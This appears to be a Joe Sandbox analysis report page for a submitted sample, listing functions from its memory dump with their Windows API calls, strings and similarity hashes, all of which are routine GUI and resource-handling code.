Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: CaptureMenu$DeleteRectWindow$Release$CreateEmptyEnableH_prolog3_ItemRedrawRoundSystem
String ID: 4{/
API String ID: 2818640433-3141077306
Opcode ID: 2e6c8de90149e3bc52a4cbe3f7d53377dee350412eb1b06bef2ed6810f0ae128
Instruction ID: db5d07951dd5841060adbed58ef2172a91493c394ed40e90ce6785cb9fdef2ff
Opcode Fuzzy Hash: 2e6c8de90149e3bc52a4cbe3f7d53377dee350412eb1b06bef2ed6810f0ae128
Instruction Fuzzy Hash: 1C219031240666BFDB316F22DC8AF6EBB69EF54750F040079F9099B2A2CB719C11CB90

Function 001D6F6B Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001D6F8D
GetWindowRect.USER32(?,?), ref: 001D6FB1
ScreenToClient.USER32(?,?), ref: 001D6FC4
ScreenToClient.USER32(?,?), ref: 001D6FCD
EqualRect.USER32(?,?), ref: 001D6FD4
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 001D6FFE
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 001D7008

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 40ef7182e8b69cc2f745c02aeada8c8149d1f1fe17ac42856b777ec38a23ea5f
Instruction ID: dc97ff924ad384b05126f2c9e4ca2789535885735d767e65df2686c465ab6b42
Opcode Fuzzy Hash: 40ef7182e8b69cc2f745c02aeada8c8149d1f1fe17ac42856b777ec38a23ea5f
Instruction Fuzzy Hash: 3521E075900209AFDB11DFA5DC84DAFF7B9EF48350B20852AE955E7254EB30A900CF60

Function 0020EFC0 Relevance: 10.6, APIs: 7, Instructions: 73windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000407,00000000,?), ref: 0020EFEC
IsRectEmpty.USER32(?), ref: 0020F00B
IsRectEmpty.USER32(?), ref: 0020F018
GetCursorPos.USER32(00000000), ref: 0020F02A
ScreenToClient.USER32(?,00000000), ref: 0020F037
PtInRect.USER32(?,00000000,00000000), ref: 0020F04A
PtInRect.USER32(?,00000000,00000000), ref: 0020F05D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Empty$ClientCursorMessageScreenSend
String ID:
API String ID: 703117857-0
Opcode ID: 2c8fa957b3b0760dd8aa14813b46ddfc3ad898ca29abfd901d86f378c863f0e8
Instruction ID: e04c4cd3a249449329e34864ac9faa7ddffb3d6b6e8a48d3ad081e9e3348fc76
Opcode Fuzzy Hash: 2c8fa957b3b0760dd8aa14813b46ddfc3ad898ca29abfd901d86f378c863f0e8
Instruction Fuzzy Hash: F221B37655030ABFDF209FA0DC48EEEBBB9EF44350F004464E545924A2DB31DA91DB10

Function 0023352C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SelectObject.GDI32(?,00000000), ref: 00233552

Part of subcall function 001D0E38: DeleteObject.GDI32 ref: 001D0E51

SelectObject.GDI32(?,00000000), ref: 00233568
DeleteObject.GDI32(00000000), ref: 002335D3
DeleteDC.GDI32(00000000), ref: 002335E2
LeaveCriticalSection.KERNEL32(00336BF4), ref: 002335FB

Strings

DR/, xrefs: 00233535

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Object$Delete$Select$CriticalLeaveSection
String ID: DR/
API String ID: 3849354926-2878275201
Opcode ID: 7390028c66008acf97fd2dc75e82cd2d8d2f7ff42dd48ba561698e7f5fd1b5f6
Instruction ID: 18fd7fb3b9476ddd5c2c8ed1ee2b360ed25e5de7b3c5b9468c4f799a31736f44
Opcode Fuzzy Hash: 7390028c66008acf97fd2dc75e82cd2d8d2f7ff42dd48ba561698e7f5fd1b5f6
Instruction Fuzzy Hash: 39219AB1900205AFCF02DF65DCC5999BBB9FF98310F408166E8089F262C771CA51CF90

Function 00211E4A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00211E7E
SHAppBarMessage.SHELL32(00000007,?), ref: 00211E9C
SHAppBarMessage.SHELL32(00000007,?), ref: 00211EB6
SHAppBarMessage.SHELL32(00000007,?), ref: 00211ECC
SHAppBarMessage.SHELL32(00000007,?), ref: 00211EE5

Strings

"9!, xrefs: 00211E6E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Message$_memset
String ID: "9!
API String ID: 2485647581-2254820984
Opcode ID: c164f76a7c8c4d2f69dc0df0a15415acf0f91db11f58268e83de7d4ddc4444d7
Instruction ID: e08c25f9f3060634a520e77efd499eef8d29717d8ad02d6d8598c97461857957
Opcode Fuzzy Hash: c164f76a7c8c4d2f69dc0df0a15415acf0f91db11f58268e83de7d4ddc4444d7
Instruction Fuzzy Hash: 36216F71E0120AAEE744CFA59C81FDABFACAB04354F04102AD905E6180DB71E994CFA0

Function 002B85F5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B8617
_wcslen.LIBCMT ref: 002B861D
GetDC.USER32(00000000), ref: 002B864C
EnumFontFamiliesExW.GDI32(00000000,?,002B85B3,?,00000000,?,?,?,?,?,?,000003EE,?), ref: 002B8667
ReleaseDC.USER32(00000000,00000000), ref: 002B866F

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

MS UI Gothic, xrefs: 002B861C, 002B862F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EnumException@8FamiliesFontH_prolog3ReleaseThrow_memset_wcslen
String ID: MS UI Gothic
API String ID: 2708522728-1905310704
Opcode ID: e3596c56da77c687c9c492e289893f83d340f2895a6acb29f83378cd1ee94396
Instruction ID: 4e1054c5761c61a8c69aa22cf7c68a9a5348c869411e1b5687e8277be9be0b61
Opcode Fuzzy Hash: e3596c56da77c687c9c492e289893f83d340f2895a6acb29f83378cd1ee94396
Instruction Fuzzy Hash: 13018271910318ABCB10EBA49D49DEEB7BCEB45740F140019F809A7141EF209A11CBA5

Function 001F9403 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCapture.USER32(?), ref: 001F941B
GetCursorPos.USER32(?), ref: 001F945A
LoadCursorW.USER32(00000000,00007F86), ref: 001F9484
SetCursor.USER32(00000000), ref: 001F948B
GetCursorPos.USER32(?), ref: 001F9498

Strings

2, xrefs: 001F94A6

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Cursor$CaptureLoad
String ID: 2
API String ID: 1460996051-3001879987
Opcode ID: 2756780dfdbe71b4fa5fa899c5a552599a603653ceebc3d86b593a01e13c724e
Instruction ID: a76e412430038b26984a6b1aa96dbcffe12a458ae00ab8d29f6b25f9f3be09f8
Opcode Fuzzy Hash: 2756780dfdbe71b4fa5fa899c5a552599a603653ceebc3d86b593a01e13c724e
Instruction Fuzzy Hash: 7B1182316007149FDB24AB74D80CFEA77E9AF69700F04082EF6CA87251CF75A841CB91

Function 001C9260 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 001C9272
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 001C928F
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 001C9299

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

KERNEL32.DLL, xrefs: 001C926A
ApplicationRecoveryInProgress, xrefs: 001C9289
ApplicationRecoveryFinished, xrefs: 001C9291

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ApplicationRecoveryFinished$ApplicationRecoveryInProgress$KERNEL32.DLL
API String ID: 417325364-4287352451
Opcode ID: a9c82a00c0d95e643b69d222b6f5e89d0c4593d7ade39b0307e25df16702e799
Instruction ID: 307a307354d0794c4fc54922dbf1c73de90a30920034eb75b92ada0f71c67406
Opcode Fuzzy Hash: a9c82a00c0d95e643b69d222b6f5e89d0c4593d7ade39b0307e25df16702e799
Instruction Fuzzy Hash: 9A01B132A40219BBDB119BB6C84CFAF7AACDFA5724F110069E40597200EBB0DD40C6A1

Function 001D8336 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001D833D
GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 001D839A
GetProcAddress.KERNEL32(UnregisterTouchWindow), ref: 001D83BC

Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504

Strings

user32.dll, xrefs: 001D835C
RegisterTouchWindow, xrefs: 001D8394
UnregisterTouchWindow, xrefs: 001D83B1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$ActivateH_prolog3
String ID: RegisterTouchWindow$UnregisterTouchWindow$user32.dll
API String ID: 1001276555-2470269259
Opcode ID: 8d04684ba1bbf948276adf21b2482bd2ab81c40a3c8a75238299b5b32c75554c
Instruction ID: c7bfdb22bc4269d707165c44156ead98374b78a7419a98a0491e6286a371029d
Opcode Fuzzy Hash: 8d04684ba1bbf948276adf21b2482bd2ab81c40a3c8a75238299b5b32c75554c
Instruction Fuzzy Hash: 4711C430E10741BFEF1B9F25ED857593BE8BB01B18F90011AE48EC22A1DB74D914CB80

Function 00235B3B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,76436BA0,00000000,TR/,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014), ref: 00235B5F
LoadResource.KERNEL32(?,00000000,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9,00000004,0028A9EA), ref: 00235B75
LockResource.KERNEL32(00000000,?,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9,00000004,0028A9EA), ref: 00235B84
FreeResource.KERNEL32(?,00000000,00000000,?,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9), ref: 00235B95
SizeofResource.KERNEL32(?,00000000,?,?,002379C6,?,?,00000084,00237D9A,0000000A,0000000A,0000000A,00000000,00000014,0028FFC9,00000004), ref: 00235BA2

Strings

TR/, xrefs: 00235B40

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$FindFreeLoadLockSizeof
String ID: TR/
API String ID: 4159136517-3081264625
Opcode ID: e53f4d88804519746e35956bf37c0b47cc24b82a74243802db97f57e5662802e
Instruction ID: d9ff8484aa72701d6f891b5aacd73d80a386721f83d4dd6f22a5207f5e4b2d2d
Opcode Fuzzy Hash: e53f4d88804519746e35956bf37c0b47cc24b82a74243802db97f57e5662802e
Instruction Fuzzy Hash: EC01D4B6511966BF8B115FA1AC48C5FBBADEF953A4B008025FD09A7210DF30CD10CBA0

Function 001C91F4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 001C9201
GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 001C921E
GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 001C9228

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Strings

RegisterApplicationRestart, xrefs: 001C9218
KERNEL32.DLL, xrefs: 001C91FC
RegisterApplicationRecoveryCallback, xrefs: 001C9220

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: KERNEL32.DLL$RegisterApplicationRecoveryCallback$RegisterApplicationRestart
API String ID: 417325364-723216104
Opcode ID: 3bf0294891b66bc30070c6a8c07e43505060d42ed9a7eed79ef87cbf93dcdd09
Instruction ID: 9be0596b0e1251fb06bdcbe69af09d854708912940813dbd6f7e9ef39f4b535a
Opcode Fuzzy Hash: 3bf0294891b66bc30070c6a8c07e43505060d42ed9a7eed79ef87cbf93dcdd09
Instruction Fuzzy Hash: A9F0683258035A7B4F225EA69C48E5B3F6DDFE5BA0744002AFD8492110EB71CD719691

Function 001D51B7 Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 001D51C5
GetSysColor.USER32(00000010), ref: 001D51CC
GetSysColor.USER32(00000014), ref: 001D51D3
GetSysColor.USER32(00000012), ref: 001D51DA
GetSysColor.USER32(00000006), ref: 001D51E1
GetSysColorBrush.USER32(0000000F), ref: 001D51EE
GetSysColorBrush.USER32(00000006), ref: 001D51F5

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 9199d09cd3b36bbeacee9b8e179c1a29d57a5b0766996b738adfa0795bec0510
Instruction ID: 1b404b6ba6b61d644b74400c07d02d4ff1db3e80b9d0be658db8787dbb3f8f99
Opcode Fuzzy Hash: 9199d09cd3b36bbeacee9b8e179c1a29d57a5b0766996b738adfa0795bec0510
Instruction Fuzzy Hash: 98F0FE719407485BD730BB725D49B47BAD1FFC4710F06092ED2858B990DAB5E441DF40

Function 001FEC57 Relevance: 9.2, APIs: 6, Instructions: 221COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001FEC89

Part of subcall function 001DCC18: GetWindowLongW.USER32(?,000000EC), ref: 001DCC23

GetWindowRect.USER32(?,?), ref: 001FED84
GetParent.USER32(?), ref: 001FED91
GetParent.USER32(?), ref: 001FEDAB
OffsetRect.USER32(?,?,?), ref: 001FEE78
OffsetRect.USER32(?,?,?), ref: 001FEE84

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window$OffsetParent$Long
String ID:
API String ID: 2171155602-0
Opcode ID: cb24c19af50942b153001680639adfa984b77824efea9565cb2c2f9db54f641d
Instruction ID: 8838dde728c6a4f15818466d2d9b6e81f7efa4ab175d069e0012048002e1b189
Opcode Fuzzy Hash: cb24c19af50942b153001680639adfa984b77824efea9565cb2c2f9db54f641d
Instruction Fuzzy Hash: C4919075D00209EFCF15DFA8D9889EEBBF5BF48300F24456AEA45A7261DB346A41CF60

Function 0022F272 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0022F279
GlobalLock.KERNEL32(?), ref: 0022F35F
CreateDialogIndirectParamW.USER32(00000000,?,458DFFFB,0022EC59,00000000), ref: 0022F38E
DestroyWindow.USER32(00000000), ref: 0022F408
GlobalUnlock.KERNEL32(?), ref: 0022F418
GlobalFree.KERNEL32(?), ref: 0022F421

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 81ce42852eeb659a39ed1959a03e64fa159f843171769da8446f920c329b37cc
Instruction ID: 62f1ffd063f432e57b45a14239e57c80766169a7d1e36372ff36fa25c1eca75b
Opcode Fuzzy Hash: 81ce42852eeb659a39ed1959a03e64fa159f843171769da8446f920c329b37cc
Instruction Fuzzy Hash: 0151AC3191028AEFCF00EFE4E985AAEBBB5AF14304F25057EF542A7291CF709A51CB51

Function 0021CEB2 Relevance: 9.1, APIs: 6, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0021CEB9
GetTopWindow.USER32(?), ref: 0021CF24
GetWindow.USER32(?,00000002), ref: 0021CF42
IsWindow.USER32(?), ref: 0021CF61
GetParent.USER32(?), ref: 0021CF6C
DestroyWindow.USER32(?), ref: 0021CF78

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

